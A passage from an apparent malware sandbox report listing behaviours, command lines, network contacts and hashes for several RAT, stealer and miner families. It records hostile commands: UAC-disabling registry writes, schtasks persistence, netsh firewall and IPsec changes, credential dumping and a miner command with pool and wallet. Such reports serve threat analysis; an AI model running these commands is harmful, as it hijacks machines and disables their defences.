| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe
"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"
C:\Users\Admin\AppData\Roaming\healastounding.exe
"C:\Users\Admin\AppData\Roaming\healastounding.exe"
C:\Users\Admin\AppData\Roaming\test.exe
"C:\Users\Admin\AppData\Roaming\test.exe"
C:\Users\Admin\AppData\Roaming\gay.exe
"C:\Users\Admin\AppData\Roaming\gay.exe"
C:\Users\Admin\AppData\Roaming\Opus.exe
"C:\Users\Admin\AppData\Roaming\Opus.exe"
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Users\Admin\AppData\Roaming\22.exe
"C:\Users\Admin\AppData\Roaming\22.exe"
C:\Users\Admin\AppData\Roaming\___11.19.exe
"C:\Users\Admin\AppData\Roaming\___11.19.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\\svchost.exe
C:\Users\Admin\AppData\Roaming\a.exe
"C:\Users\Admin\AppData\Roaming\a.exe"
C:\Users\Admin\AppData\Local\Temp\svchos.exe
C:\Users\Admin\AppData\Local\Temp\\svchos.exe
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -auto
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -acsi
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Users\Admin\AppData\Roaming\mediaget.exe
"C:\Users\Admin\AppData\Roaming\mediaget.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DSL Manager" /xml "C:\Users\Admin\AppData\Local\Temp\tmpBC4D.tmp"
C:\Windows\SysWOW64\PING.EXE
ping -n 2 127.0.0.1
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DSL Manager Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpC3DC.tmp"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\259440504.txt",MainThread
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "aaa" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\aaa.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "mediaget" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\mediaget\mediaget.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\hh\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "mediaget" /sc ONLOGON /tr "'C:\PerfLogs\Admin\mediaget.exe'" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=FilteraAtion1 action=block
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Block assign=y
C:\Windows\Help\Winlogon.exe
C:\Windows\Help\Winlogon.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 216
C:\Windows\Cursors\WUDFhosts.exe
C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 796
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| MD | 194.180.174.53:80 | tcp | |
| CN | 59.56.110.231:8898 | tcp | |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | pretorian.ac.ug | udp |
| US | 8.8.8.8:53 | prepepe.ac.ug | udp |
| US | 172.67.74.152:80 | api.ipify.org | tcp |
| RU | 80.87.192.115:80 | tcp | |
| CA | 172.98.92.42:58491 | tcp | |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| US | 8.8.8.8:53 | yabynennet.xyz | udp |
| MD | 194.180.174.53:80 | tcp | |
| US | 104.19.222.79:80 | whatismyipaddress.com | tcp |
| US | 107.178.223.183:81 | yabynennet.xyz | tcp |
| US | 104.19.222.79:443 | whatismyipaddress.com | tcp |
| US | 104.19.222.79:443 | whatismyipaddress.com | tcp |
| US | 8.8.8.8:53 | pretorian.ac.ug | udp |
| HU | 91.219.236.18:80 | 91.219.236.18 | tcp |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| MD | 194.180.174.41:80 | tcp | |
| US | 8.8.8.8:53 | 22ssh.com | udp |
| MD | 194.180.174.41:80 | tcp | |
| US | 8.8.8.8:53 | pool.usa-138.com | udp |
| SG | 45.77.45.115:80 | pool.usa-138.com | tcp |
| HU | 91.219.236.148:80 | tcp | |
| CA | 172.98.92.42:58491 | tcp | |
| HU | 91.219.236.148:80 | tcp | |
| RU | 80.87.192.115:80 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | files.000webhost.com | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CA | 172.98.92.42:58491 | tcp | |
| RU | 80.87.192.115:80 | tcp |
Files
memory/2372-0-0x0000000074091000-0x0000000074092000-memory.dmp
memory/2372-1-0x0000000074090000-0x000000007463B000-memory.dmp
memory/2372-2-0x0000000074090000-0x000000007463B000-memory.dmp
\Users\Admin\AppData\Roaming\healastounding.exe
| MD5 | 6fb798f1090448ce26299c2b35acf876 |
| SHA1 | 451423d5690cffa02741d5da6e7c45bc08aefb55 |
| SHA256 | b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f |
| SHA512 | 9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3 |
memory/2540-14-0x0000000074090000-0x000000007463B000-memory.dmp
\Users\Admin\AppData\Roaming\gay.exe
| MD5 | 8eedc01c11b251481dec59e5308dccc3 |
| SHA1 | 24bf069e9f2a1f12aefa391674ed82059386b0aa |
| SHA256 | 0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d |
| SHA512 | 52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc |
C:\Users\Admin\AppData\Roaming\test.exe
| MD5 | 7e50b292982932190179245c60c0b59b |
| SHA1 | 25cf641ddcdc818f32837db236a58060426b5571 |
| SHA256 | a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8 |
| SHA512 | c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885 |
C:\Users\Admin\AppData\Roaming\aaa.exe
| MD5 | 860aa57fc3578f7037bb27fc79b2a62c |
| SHA1 | a14008fe5e1eb88bf46266de3d5ee5db2e0a722b |
| SHA256 | 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29 |
| SHA512 | 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1 |
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
| MD5 | ed666bf7f4a0766fcec0e9c8074b089b |
| SHA1 | 1b90f1a4cb6059d573fff115b3598604825d76e6 |
| SHA256 | d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264 |
| SHA512 | d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49 |
\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
| MD5 | 0fd7de5367376231a788872005d7ed4f |
| SHA1 | 658e4d5efb8b14661967be2183cc60e3e561b2b6 |
| SHA256 | 9083992637e90e412e6f4e77331eb69ee8db821c54bbc38533e0f889cc4ca9dd |
| SHA512 | 522d5be2803fbce0d12c325cc2ef1e3a92cec03aeba7d1164530093ad58caecd827dd557ca3c182a66c6667150e731de37bb552d19425f96cc78fe3423e1a863 |
\Users\Admin\AppData\Roaming\4.exe
| MD5 | e6dace3f577ac7a6f9747b4a0956c8d7 |
| SHA1 | 86c71169025b822a8dfba679ea981035ce1abfd1 |
| SHA256 | 8b4b846fe1023fa173ab410e3a5862a4c09f16534e14926878e387092e7ffb63 |
| SHA512 | 1c8554d3d9a1b1509ba1df569ede3fb7a081bef84394c708c4f1a2fb8779f012c74fbf6de085514e0c8debb5079cc23c6c6112b95bf2f0ab6a8f0bd156a3e268 |
C:\Users\Admin\AppData\Roaming\22.exe
| MD5 | dbf9daa1707b1037e28a6e0694b33a4b |
| SHA1 | ddc1fcec1c25f2d97c372fffa247969aa6cd35ef |
| SHA256 | a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6 |
| SHA512 | 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd |
\Users\Admin\AppData\Roaming\___11.19.exe
| MD5 | a071727b72a8374ff79a695ecde32594 |
| SHA1 | b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc |
| SHA256 | 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745 |
| SHA512 | 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400 |
memory/2540-100-0x00000000057C0000-0x0000000005B82000-memory.dmp
memory/316-103-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/2940-108-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Windows\SysWOW64\TXPlatforn.exe
| MD5 | a4329177954d4104005bce3020e5ef59 |
| SHA1 | 23c29e295e2dbb8454012d619ca3f81e4c16e85a |
| SHA256 | 6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd |
| SHA512 | 81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208 |
memory/2940-107-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
| MD5 | 78d40b12ffc837843fbf4de2164002f6 |
| SHA1 | 985bdffa69bb915831cd6b81783aef3ae4418f53 |
| SHA256 | 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44 |
| SHA512 | c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79 |
memory/2540-126-0x0000000074090000-0x000000007463B000-memory.dmp
memory/2940-105-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Roaming\a.exe
| MD5 | 52cfd35f337ca837d31df0a95ce2a55e |
| SHA1 | 88eb919fa2761f739f02a025e4f9bf1fd340b6ff |
| SHA256 | 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448 |
| SHA512 | b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73 |
memory/1808-138-0x0000000005130000-0x00000000066DA000-memory.dmp
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
| MD5 | 8f1c8b40c7be588389a8d382040b23bb |
| SHA1 | bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a |
| SHA256 | ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1 |
| SHA512 | 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f |
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
| MD5 | 870d6e5aef6dea98ced388cce87bfbd4 |
| SHA1 | 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54 |
| SHA256 | 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0 |
| SHA512 | 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566 |
memory/1656-171-0x0000000000400000-0x0000000000438000-memory.dmp
memory/620-169-0x0000000000400000-0x0000000000424000-memory.dmp
memory/620-167-0x0000000000400000-0x0000000000424000-memory.dmp
memory/316-162-0x0000000000400000-0x00000000007C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\HD_X.dat
| MD5 | 696a7236e14e7407b5023681fba1d690 |
| SHA1 | 43c550a8ab63b5f5a2a2622e5f614c4aaeeaf78e |
| SHA256 | af034321362311726b4f39f658d691b7cf2ddf6eccd13f771532abde387f720a |
| SHA512 | 4582231dde50799d1925ba884e6e9d4bfde0a7ca56ee0f9d7bb0ccea18cbb73bda8bdf4de387537ade3d0be5c496f5748346c91806da72f7bf2e0fd814a6d0a0 |
memory/2188-160-0x0000000000400000-0x0000000000495000-memory.dmp
memory/1808-140-0x0000000005130000-0x00000000066DA000-memory.dmp
memory/2000-139-0x0000000000400000-0x00000000019AA000-memory.dmp
memory/1224-147-0x0000000000400000-0x000000000044F000-memory.dmp
memory/1224-145-0x0000000000400000-0x000000000044F000-memory.dmp
memory/1224-144-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
| MD5 | b14120b6701d42147208ebf264ad9981 |
| SHA1 | f3cff7ac8e6c1671d2c3387648e54f80957196de |
| SHA256 | d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97 |
| SHA512 | 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b |
C:\Users\Admin\AppData\Local\Temp\svchos.exe
| MD5 | 3b377ad877a942ec9f60ea285f7119a2 |
| SHA1 | 60b23987b20d913982f723ab375eef50fafa6c70 |
| SHA256 | 62954fdf65e629b39a29f539619d20691332184c6b6be5a826128a8e759bfa84 |
| SHA512 | af3a71f867ad9d28772c48b521097f9bf8931eb89fd2974e8de10990241419a39ddc3c0b36dd38aac4fdf14e1f0c5e228692618e93adce958d5b5dab8940e46f |
memory/2372-88-0x0000000074090000-0x000000007463B000-memory.dmp
memory/2540-61-0x0000000074090000-0x000000007463B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Opus.exe
| MD5 | 759185ee3724d7563b709c888c696959 |
| SHA1 | 7c166cc3cbfef08bb378bcf557b1f45396a22931 |
| SHA256 | 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641 |
| SHA512 | ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c |
memory/2540-12-0x0000000074090000-0x000000007463B000-memory.dmp
memory/2364-216-0x0000000000A50000-0x0000000000A62000-memory.dmp
memory/316-219-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/2272-229-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/2272-235-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Roaming\3.exe
| MD5 | 748a4bea8c0624a4c7a69f67263e0839 |
| SHA1 | 6955b7d516df38992ac6bff9d0b0f5df150df859 |
| SHA256 | 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e |
| SHA512 | 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd |
memory/2000-248-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2188-244-0x0000000000400000-0x0000000000495000-memory.dmp
memory/1656-242-0x0000000000400000-0x0000000000438000-memory.dmp
memory/2216-217-0x0000000000400000-0x0000000000625000-memory.dmp
memory/2272-271-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/2000-270-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-267-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-263-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-259-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-256-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-254-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2000-250-0x0000000005FC0000-0x0000000006382000-memory.dmp
memory/2168-275-0x0000000000100000-0x0000000000194000-memory.dmp
C:\ProgramData\kaosdma.txt
| MD5 | 2c807857a435aa8554d595bd14ed35d1 |
| SHA1 | 9003a73beceab3d1b1cd65614347c33117041a95 |
| SHA256 | 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b |
| SHA512 | 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9 |
memory/2168-292-0x00000000002E0000-0x00000000002EC000-memory.dmp
memory/2168-293-0x0000000000300000-0x000000000030A000-memory.dmp
memory/2168-295-0x0000000000310000-0x000000000031C000-memory.dmp
memory/2168-294-0x00000000002F0000-0x00000000002FC000-memory.dmp
memory/1808-296-0x0000000005130000-0x00000000066DA000-memory.dmp
memory/2000-299-0x0000000000400000-0x00000000019AA000-memory.dmp
memory/1656-304-0x0000000000400000-0x0000000000434000-memory.dmp
memory/620-303-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2188-302-0x0000000000400000-0x0000000000491000-memory.dmp
memory/1224-301-0x0000000000400000-0x000000000044F000-memory.dmp
memory/1808-305-0x0000000005130000-0x00000000066DA000-memory.dmp
memory/620-319-0x0000000000400000-0x0000000000420000-memory.dmp
memory/620-318-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2700-320-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2700-321-0x0000000000400000-0x000000000041B000-memory.dmp
memory/548-354-0x0000000001CA0000-0x0000000002220000-memory.dmp
memory/604-355-0x000000013F610000-0x000000013FB90000-memory.dmp
memory/548-380-0x0000000001CA0000-0x0000000002220000-memory.dmp
memory/604-382-0x000000013F610000-0x000000013FB90000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-07 03:49
Reported
2024-12-07 03:49
Platform
win10v2004-20241007-en
Max time kernel
2s
Max time network
27s
Command Line
Signatures
AsyncRat
Asyncrat family
Blackmoon family
Blackmoon, KrBanker
DcRat
Dcrat family
Detect Blackmoon payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect PurpleFox Rootkit
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fickerstealer
Fickerstealer family
Gh0st RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gh0strat
Gh0strat family
Njrat family
Oski
Oski family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
